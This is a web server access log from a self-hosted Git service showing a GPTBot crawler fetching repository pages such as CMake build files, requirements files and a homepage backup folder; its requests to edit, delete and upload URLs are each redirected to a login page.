+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:15:57:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10811] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:57:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10813] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:57:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:57:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:57:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/MIGRATION_GUIDE.md?display=source" [Client 74.7.227.38] [Length 20912] [Gzip 6.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/MIGRATION_GUIDE.md" -[17/Feb/2026:15:57:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/requirements.txt?display=rendered" [Client 74.7.227.38] [Length 10949] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/requirements.txt" -[17/Feb/2026:15:57:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/updateRecord.md?display=source" [Client 74.7.227.38] [Length 18625] [Gzip 4.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/updateRecord.md" -[17/Feb/2026:15:57:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/updateRecord.md?display=rendered" [Client 74.7.227.38] [Length 16024] [Gzip 2.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/updateRecord.md" -[17/Feb/2026:15:57:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/requirements.txt?display=source" [Client 74.7.227.38] [Length 11436] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/requirements.txt" -[17/Feb/2026:15:57:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup" [Client 74.7.227.38] [Length 11798] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage" -[17/Feb/2026:15:57:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:15:57:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43114] [Gzip 19.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:15:57:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9999] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:15:57:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/projects?q=&sort=alphabetically&state=open" [Client 74.7.227.38] [Length 7803] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/projects" -[17/Feb/2026:15:57:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/services/geminiService.ts?display=rendered" [Client 74.7.227.38] [Length 10912] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/services/geminiService.ts" -[17/Feb/2026:15:57:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include/site/python3.12/greenlet" [Client 74.7.227.38] [Length 9958] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include/site/python3.12/greenlet" -[17/Feb/2026:15:57:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13715] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:57:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13717] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:57:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/.gitignore?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/.gitignore" -[17/Feb/2026:15:57:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 9995] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:15:57:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 12158] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup" -[17/Feb/2026:15:57:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup" -[17/Feb/2026:15:57:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup" -[17/Feb/2026:15:57:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html" [Client 74.7.227.38] [Length 14639] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup" -[17/Feb/2026:15:57:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/.Backup" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup" -[17/Feb/2026:15:57:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/.Backup" -[17/Feb/2026:15:57:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup" -[17/Feb/2026:15:57:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup" -[17/Feb/2026:15:57:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 12707] [Gzip 6.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:15:57:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 10241] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:15:57:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13648] [Gzip 7.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:15:57:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13651] [Gzip 7.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:15:57:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 9965] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:15:57:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 9964] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:15:57:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/docker-compose.yml" -[17/Feb/2026:15:57:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/docker-compose.yml" -[17/Feb/2026:15:57:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/docker-compose.yml" -[17/Feb/2026:15:58:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/docker-compose.yml" -[17/Feb/2026:15:58:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets" [Client 74.7.227.38] [Length 11078] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html" -[17/Feb/2026:15:58:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components" [Client 74.7.227.38] [Length 10836] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html" -[17/Feb/2026:15:58:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 11709] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html" -[17/Feb/2026:15:58:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/services" [Client 74.7.227.38] [Length 10181] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html" -[17/Feb/2026:15:58:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 12174] [Gzip 3.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html" -[17/Feb/2026:15:58:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/.Backup/html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html" -[17/Feb/2026:15:58:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/.Backup/html" -[17/Feb/2026:15:58:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html" -[17/Feb/2026:15:58:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html" -[17/Feb/2026:15:58:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html" -[17/Feb/2026:15:58:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html" -[17/Feb/2026:15:58:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/README.md" [Client 74.7.227.38] [Length 11572] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html" -[17/Feb/2026:15:58:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 13012] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html" -[17/Feb/2026:15:58:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/types.ts" [Client 74.7.227.38] [Length 11742] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html" -[17/Feb/2026:15:58:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/assets" [Client 74.7.227.38] [Length 10027] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets" -[17/Feb/2026:15:58:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/components" [Client 74.7.227.38] [Length 9788] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components" -[17/Feb/2026:15:58:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 11021] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/.gitignore" -[17/Feb/2026:15:58:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 9780] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/.gitignore" -[17/Feb/2026:15:58:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/vite.config.ts" -[17/Feb/2026:15:58:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] 